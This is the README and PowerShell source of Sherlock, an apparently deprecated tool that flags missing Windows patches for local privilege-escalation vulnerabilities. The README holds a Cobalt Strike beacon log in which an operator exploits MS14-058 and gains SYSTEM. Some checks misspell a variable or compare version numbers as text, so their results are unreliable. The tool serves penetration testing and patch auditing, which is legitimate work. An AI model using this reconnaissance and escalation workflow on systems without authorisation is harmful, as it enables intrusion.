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1 | > Deprecated. Have a look at [Watson](https://github.com/rasta-mouse/Watson) instead.
2 |
3 | # Sherlock
4 |
5 | PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
6 |
7 | ## Currently looks for:
8 |
9 | * MS10-015 : User Mode to Ring (KiTrap0D)
10 | * MS10-092 : Task Scheduler
11 | * MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
12 | * MS13-081 : TrackPopupMenuEx Win32k NULL Page
13 | * MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
14 | * MS15-051 : ClientCopyImage Win32k
15 | * MS15-078 : Font Driver Buffer Overflow
16 | * MS16-016 : 'mrxdav.sys' WebDAV
17 | * MS16-032 : Secondary Logon Handle
18 | * MS16-034 : Windows Kernel-Mode Drivers EoP
19 | * MS16-135 : Win32k Elevation of Privilege
20 | * CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc
21 |
22 | ## Basic Usage:
23 |
24 | ```
25 | beacon> getuid
26 | [*] Tasked beacon to get userid
27 | [+] host called home, sent: 20 bytes
28 | [*] You are Win7-x64\Rasta
29 |
30 | beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
31 | [*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
32 | [+] host called home, sent: 2960 bytes
33 |
34 | beacon> powershell Find-MS14058
35 | [*] Tasked beacon to run: Find-MS14058
36 | [+] host called home, sent: 20 bytes
37 | [+] received output:
38 |
39 | Title : TrackPopupMenu Win32k Null Pointer Dereference
40 | MSBulletin : MS14-058
41 | CVEID : 2014-4113
42 | Link : https://www.exploit-db.com/exploits/35101/
43 | VulnStatus : Appears Vulnerable
44 |
45 | beacon> elevate ms14-058 smb
46 | [*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
47 | [+] host called home, sent: 105015 bytes
48 | [+] received output:
49 | [*] Getting Windows version...
50 | [*] Solving symbols...
51 | [*] Requesting Kernel loaded modules...
52 | [*] pZwQuerySystemInformation required length 51216
53 | [*] Parsing SYSTEM_INFO...
54 | [*] 173 Kernel modules found
55 | [*] Checking module \SystemRoot\system32\ntoskrnl.exe
56 | [*] Good! nt found as ntoskrnl.exe at 0x0264f000
57 | [*] ntoskrnl.exe loaded in userspace at: 40000000
58 | [*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
59 | [*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
60 | [*] Registering class...
61 | [*] Creating window...
62 | [*] Allocating null page...
63 | [*] Getting PtiCurrent...
64 | [*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
65 | [*] Creating a fake structure at NULL...
66 | [*] Triggering vulnerability...
67 | [!] Executing payload...
68 |
69 | [+] host called home, sent: 204885 bytes
70 | [+] established link to child beacon: 192.168.56.105
71 |
72 | beacon> getuid
73 | [*] Tasked beacon to get userid
74 | [+] host called home, sent: 8 bytes
75 | [*] You are NT AUTHORITY\SYSTEM (admin)
76 | ```
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1 | <#
2 |
3 | File: Sherlock.ps1
4 | Author: @_RastaMouse
5 | License: GNU General Public License v3.0
6 |
7 | #>
8 |
9 | <#
10 |
11 | RTM build reference, because I'm stupid and forget...
12 |
13 | 6002: Vista SP2/2008 SP2
14 | 7600: 7/2008 R2
15 | 7601: 7 SP1/2008 R2 SP1
16 | 9200: 8/2012
17 | 9600: 8.1/2012 R2
18 | 10240: 10 Threshold
19 | 10586: 10 Threshold 2
20 | 14393: 10 Redstone/2016
21 | 15063: 10 Redstone 2
22 | 16299: 10 Redstone 3
23 | 17134: 10 Redstone 4
24 |
25 | #>
26 |
27 | $Global:ExploitTable = $null
28 |
29 | function Get-FileVersionInfo ($FilePath) {
30 |
31 | $VersionInfo = (Get-Item $FilePath).VersionInfo
32 | $FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart )
33 |
34 | return $FileVersion
35 |
36 | }
37 |
38 | function Get-InstalledSoftware($SoftwareName) {
39 |
40 | $SoftwareVersion = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $SoftwareName } | Select-Object Version
41 | $SoftwareVersion = $SoftwareVersion.Version # I have no idea what I'm doing
42 |
43 | return $SoftwareVersion
44 |
45 | }
46 |
47 | function Get-Architecture {
48 |
49 | # This is the CPU architecture. Returns "64-bit" or "32-bit".
50 | $CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
51 |
52 | # This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86".
53 | $ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE
54 |
55 | return $CPUArchitecture, $ProcessArchitecture
56 |
57 | }
58 |
59 | function Get-CPUCoreCount {
60 |
61 | $CoreCount = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors
62 |
63 | return $CoreCount
64 |
65 | }
66 |
67 | function New-ExploitTable {
68 |
69 | # Create the table
70 | $Global:ExploitTable = New-Object System.Data.DataTable
71 |
72 | # Create the columns
73 | $Global:ExploitTable.Columns.Add("Title")
74 | $Global:ExploitTable.Columns.Add("MSBulletin")
75 | $Global:ExploitTable.Columns.Add("CVEID")
76 | $Global:ExploitTable.Columns.Add("Link")
77 | $Global:ExploitTable.Columns.Add("VulnStatus")
78 |
79 | # Add the exploits we are interested in.
80 |
81 | # MS10
82 | $Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/")
83 | $Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/")
84 | # MS13
85 | $Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/")
86 | $Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/")
87 | # MS14
88 | $Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/")
89 | # MS15
90 | $Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/")
91 | $Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/")
92 | # MS16
93 | $Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/")
94 | $Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/")
95 | $Global:ExploitTable.Rows.Add("Windows Kernel-Mode Drivers EoP","MS16-034","2016-0093/94/95/96","https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?")
96 | $Global:ExploitTable.Rows.Add("Win32k Elevation of Privilege","MS16-135","2016-7255","https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135")
97 | # Miscs that aren't MS
98 | $Global:ExploitTable.Rows.Add("Nessus Agent 6.6.2 - 6.10.3","N/A","2017-7199","https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html")
99 |
100 | }
101 |
102 | function Set-ExploitTable ($MSBulletin, $VulnStatus) {
103 |
104 | if ( $MSBulletin -like "MS*" ) {
105 |
106 | $Global:ExploitTable | Where-Object { $_.MSBulletin -eq $MSBulletin
107 |
108 | } | ForEach-Object {
109 |
110 | $_.VulnStatus = $VulnStatus
111 |
112 | }
113 |
114 | } else {
115 |
116 |
117 | $Global:ExploitTable | Where-Object { $_.CVEID -eq $MSBulletin
118 |
119 | } | ForEach-Object {
120 |
121 | $_.VulnStatus = $VulnStatus
122 |
123 | }
124 |
125 | }
126 |
127 | }
128 |
129 | function Get-Results {
130 |
131 | $Global:ExploitTable
132 |
133 | }
134 |
135 | function Find-AllVulns {
136 |
137 | if ( !$Global:ExploitTable ) {
138 |
139 | $null = New-ExploitTable
140 |
141 | }
142 |
143 | Find-MS10015
144 | Find-MS10092
145 | Find-MS13053
146 | Find-MS13081
147 | Find-MS14058
148 | Find-MS15051
149 | Find-MS15078
150 | Find-MS16016
151 | Find-MS16032
152 | Find-MS16034
153 | Find-MS16135
154 | Find-CVE20177199
155 |
156 | Get-Results
157 |
158 | }
159 |
160 | function Find-MS10015 {
161 |
162 | $MSBulletin = "MS10-015"
163 | $Architecture = Get-Architecture
164 |
165 | if ( $Architecture[0] -eq "64-bit" ) {
166 |
167 | $VulnStatus = "Not supported on 64-bit systems"
168 |
169 | } Else {
170 |
171 | $Path = $env:windir + "\system32\ntoskrnl.exe"
172 | $VersionInfo = Get-FileVersionInfo($Path)
173 | $VersionInfo = $VersionInfo.Split(".")
174 |
175 | $Build = $VersionInfo[2]
176 | $Revision = $VersionInfo[3].Split(" ")[0]
177 |
178 | switch ( $Build ) {
179 |
180 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20591" ] }
181 | default { $VulnStatus = "Not Vulnerable" }
182 |
183 | }
184 |
185 | }
186 |
187 | Set-ExploitTable $MSBulletin $VulnStatus
188 |
189 | }
190 |
191 | function Find-MS10092 {
192 |
193 | $MSBulletin = "MS10-092"
194 | $Architecture = Get-Architecture
195 |
196 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
197 |
198 | $Path = $env:windir + "\system32\schedsvc.dll"
199 |
200 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
201 |
202 | $Path = $env:windir + "\sysnative\schedsvc.dll"
203 |
204 | }
205 |
206 | $VersionInfo = Get-FileVersionInfo($Path)
207 | $VersionInfo = $VersionInfo.Split(".")
208 |
209 | $Build = $VersionInfo[2]
210 | $Revision = $VersionInfo[3].Split(" ")[0]
211 |
212 | switch ( $Build ) {
213 |
214 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20830" ] }
215 | default { $VulnStatus = "Not Vulnerable" }
216 |
217 | }
218 |
219 | Set-ExploitTable $MSBulletin $VulnStatus
220 |
221 | }
222 |
223 | function Find-MS13053 {
224 |
225 | $MSBulletin = "MS13-053"
226 | $Architecture = Get-Architecture
227 |
228 | if ( $Architecture[0] -eq "64-bit" ) {
229 |
230 | $VulnStatus = "Not supported on 64-bit systems"
231 |
232 | } Else {
233 |
234 | $Path = $env:windir + "\system32\win32k.sys"
235 | $VersionInfo = Get-FileVersionInfo($Path)
236 | $VersionInfo = $VersionInfo.Split(".")
237 |
238 | $Build = $VersionInfo[2]
239 | $Revision = $VersionInfo[3].Split(" ")[0]
240 |
241 | switch ( $Build ) {
242 |
243 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "17000" ] }
244 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22348" ] }
245 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20732" ] }
246 | default { $VulnStatus = "Not Vulnerable" }
247 |
248 | }
249 |
250 | }
251 |
252 | Set-ExploitTable $MSBulletin $VulnStatus
253 |
254 | }
255 |
256 | function Find-MS13081 {
257 |
258 | $MSBulletin = "MS13-081"
259 | $Architecture = Get-Architecture
260 |
261 | if ( $Architecture[0] -eq "64-bit" ) {
262 |
263 | $VulnStatus = "Not supported on 64-bit systems"
264 |
265 | } Else {
266 |
267 | $Path = $env:windir + "\system32\win32k.sys"
268 | $VersionInfo = Get-FileVersionInfo($Path)
269 | $VersionInfo = $VersionInfo.Split(".")
270 |
271 | $Build = $VersionInfo[2]
272 | $Revision = $VersionInfo[3].Split(" ")[0]
273 |
274 | switch ( $Build ) {
275 |
276 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] }
277 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22435" ] }
278 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20807" ] }
279 | default { $VulnStatus = "Not Vulnerable" }
280 |
281 | }
282 |
283 | }
284 |
285 | Set-ExploitTable $MSBulletin $VulnStatus
286 |
287 | }
288 |
289 | function Find-MS14058 {
290 |
291 | $MSBulletin = "MS14-058"
292 | $Architecture = Get-Architecture
293 |
294 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
295 |
296 | $Path = $env:windir + "\system32\win32k.sys"
297 |
298 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
299 |
300 | $Path = $env:windir + "\sysnative\win32k.sys"
301 |
302 | }
303 |
304 | $VersionInfo = Get-FileVersionInfo($Path)
305 | $VersionInfo = $VersionInfo.Split(".")
306 |
307 | $Build = $VersionInfo[2]
308 | $Revision = $VersionInfo[3].Split(" ")[0]
309 |
310 | switch ( $Build ) {
311 |
312 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] }
313 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] }
314 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] }
315 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] }
316 | default { $VulnStatus = "Not Vulnerable" }
317 |
318 | }
319 |
320 | Set-ExploitTable $MSBulletin $VulnStatus
321 |
322 | }
323 |
324 | function Find-MS15051 {
325 |
326 | $MSBulletin = "MS15-051"
327 | $Architecture = Get-Architecture
328 |
329 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
330 |
331 | $Path = $env:windir + "\system32\win32k.sys"
332 |
333 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
334 |
335 | $Path = $env:windir + "\sysnative\win32k.sys"
336 |
337 | }
338 |
339 | $VersionInfo = Get-FileVersionInfo($Path)
340 | $VersionInfo = $VersionInfo.Split(".")
341 |
342 | $Build = $VersionInfo[2]
343 | $Revision = $VersionInfo[3].Split(" ")[0]
344 |
345 | switch ( $Build ) {
346 |
347 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18000" ] }
348 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] }
349 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] }
350 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] }
351 | default { $VulnStatus = "Not Vulnerable" }
352 |
353 | }
354 |
355 | Set-ExploitTable $MSBulletin $VulnStatus
356 |
357 | }
358 |
359 | function Find-MS15078 {
360 |
361 | $MSBulletin = "MS15-078"
362 |
363 | $Path = $env:windir + "\system32\atmfd.dll"
364 | $VersionInfo = Get-FileVersionInfo($Path)
365 | $VersionInfo = $VersionInfo.Split(" ")
366 |
367 | $Revision = $VersionInfo[2]
368 |
369 | switch ( $Revision ) {
370 |
371 | 243 { $VulnStatus = "Appears Vulnerable" }
372 | default { $VulnStatus = "Not Vulnerable" }
373 |
374 | }
375 |
376 | Set-ExploitTable $MSBulletin $VulnStatus
377 |
378 | }
379 |
380 | function Find-MS16016 {
381 |
382 | $MSBulletin = "MS16-016"
383 | $Architecture = Get-Architecture
384 |
385 | if ( $Architecture[0] -eq "64-bit" ) {
386 |
387 | $VulnStatus = "Not supported on 64-bit systems"
388 |
389 | } Else {
390 |
391 | $Path = $env:windir + "\system32\drivers\mrxdav.sys"
392 | $VersionInfo = Get-FileVersionInfo($Path)
393 | $VersionInfo = $VersionInfo.Split(".")
394 |
395 | $Build = $VersionInfo[2]
396 | $Revision = $VersionInfo[3].Split(" ")[0]
397 |
398 | switch ( $Build ) {
399 |
400 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16000" ] }
401 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "23317" ] }
402 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21738" ] }
403 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18189" ] }
404 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16683" ] }
405 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "103" ] }
406 | default { $VulnStatus = "Not Vulnerable" }
407 |
408 | }
409 |
410 | }
411 |
412 | Set-ExploitTable $MSBulletin $VulnStatus
413 |
414 | }
415 |
416 | function Find-MS16032 {
417 |
418 | $MSBulletin = "MS16-032"
419 |
420 | $CPUCount = Get-CPUCoreCount
421 |
422 | if ( $CPUCount -eq "1" ) {
423 |
424 | $VulnStatus = "Not Supported on single-core systems"
425 |
426 | } Else {
427 |
428 | $Architecture = Get-Architecture
429 |
430 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
431 |
432 | $Path = $env:windir + "\system32\seclogon.dll"
433 |
434 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
435 |
436 | $Path = $env:windir + "\sysnative\seclogon.dll"
437 |
438 | }
439 |
440 | $VersionInfo = Get-FileVersionInfo($Path)
441 |
442 | $VersionInfo = $VersionInfo.Split(".")
443 |
444 | $Build = [int]$VersionInfo[2]
445 | $Revision = [int]$VersionInfo[3].Split(" ")[0]
446 |
447 | switch ( $Build ) {
448 |
449 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19598 -Or ( $Revision -ge 23000 -And $Revision -le 23909 ) ] }
450 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19148 ] }
451 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19148 -Or ( $Revision -ge 23000 -And $Revision -le 23347 ) ] }
452 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17649 -Or ( $Revision -ge 21000 -And $Revision -le 21767 ) ] }
453 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18230 ] }
454 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 16724 ] }
455 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 161 ] }
456 | default { $VulnStatus = "Not Vulnerable" }
457 |
458 | }
459 | }
460 |
461 | Set-ExploitTable $MSBulletin $VulnStatus
462 |
463 | }
464 |
465 | function Find-MS16034 {
466 |
467 | $MSBulletin = "MS16-034"
468 |
469 | $Architecture = Get-Architecture
470 |
471 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
472 |
473 | $Path = $env:windir + "\system32\win32k.sys"
474 |
475 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
476 |
477 | $Path = $env:windir + "\sysnative\win32k.sys"
478 |
479 | }
480 |
481 | $VersionInfo = Get-FileVersionInfo($Path)
482 |
483 | $VersionInfo = $VersionInfo.Split(".")
484 |
485 | $Build = [int]$VersionInfo[2]
486 | $Revision = [int]$VersionInfo[3].Split(" ")[0]
487 |
488 | switch ( $Build ) {
489 |
490 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19597 -Or $Revision -lt 23908 ] }
491 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19145 -Or $Revision -lt 23346 ] }
492 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17647 -Or $Revision -lt 21766 ] }
493 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18228 ] }
494 | default { $VulnStatus = "Not Vulnerable" }
495 |
496 | }
497 |
498 | Set-ExploitTable $MSBulletin $VulnStatus
499 |
500 | }
501 |
502 | function Find-CVE20177199 {
503 |
504 | $CVEID = "2017-7199"
505 | $SoftwareVersion = Get-InstalledSoftware "Nessus Agent"
506 |
507 | if ( !$SoftwareVersion ) {
508 |
509 | $VulnStatus = "Not Vulnerable"
510 |
511 | } else {
512 |
513 | $SoftwareVersion = $SoftwareVersion.Split(".")
514 |
515 | $Major = [int]$SoftwareVersion[0]
516 | $Minor = [int]$SoftwareVersion[1]
517 | $Build = [int]$SoftwareVersion[2]
518 |
519 | switch( $Major ) {
520 |
521 | 6 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Minor -eq 10 -and $Build -le 3 -Or ( $Minor -eq 6 -and $Build -le 2 ) -Or ( $Minor -le 9 -and $Minor -ge 7 ) ] } # 6.6.2 - 6.10.3
522 | default { $VulnStatus = "Not Vulnerable" }
523 |
524 | }
525 |
526 | }
527 |
528 | Set-ExploitTable $CVEID $VulnStatus
529 |
530 | }
531 |
532 | function Find-MS16135 {
533 |
534 | $MSBulletin = "MS16-135"
535 | $Architecture = Get-Architecture
536 |
537 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
538 |
539 | $Path = $env:windir + "\system32\win32k.sys"
540 |
541 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
542 |
543 | $Path = $env:windir + "\sysnative\win32k.sys"
544 |
545 | }
546 |
547 | $VersionInfo = Get-FileVersionInfo($Path)
548 | $VersionInfo = $VersionInfo.Split(".")
549 |
550 | $Build = [int]$VersionInfo[2]
551 | $Revision = [int]$VersionInfo[3].Split(" ")[0]
552 |
553 | switch ( $Build ) {
554 |
555 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 23584 ] }
556 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 18524 ] }
557 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 16384 ] }
558 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] }
559 | 14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] }
560 | default { $VulnStatus = "Not Vulnerable" }
561 |
562 | }
563 |
564 | Set-ExploitTable $MSBulletin $VulnStatus
565 |
566 | }
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